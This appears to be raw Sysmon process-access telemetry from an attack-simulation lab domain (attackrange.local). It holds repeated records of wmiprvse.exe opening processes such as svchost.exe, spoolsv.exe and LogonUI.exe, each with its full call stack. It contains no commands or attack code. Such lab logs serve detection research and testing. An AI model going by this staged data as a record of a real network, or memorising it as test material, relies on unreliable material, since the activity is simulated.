15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026846Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026845Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026844Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026843Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026842Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026841Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026840Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026839Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1700-00000000A301}1656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026838Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1600-00000000A301}1536C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026837Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1500-00000000A301}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026836Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1400-00000000A301}1280C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026835Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.616{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1300-00000000A301}1264C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026834Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1200-00000000A301}1176C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026833Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1100-00000000A301}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026832Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-1000-00000000A301}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026831Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0F00-00000000A301}1112C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026830Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0E00-00000000A301}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026829Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4987-6008-0D00-00000000A301}996C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026828Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:39.600{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000026827Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 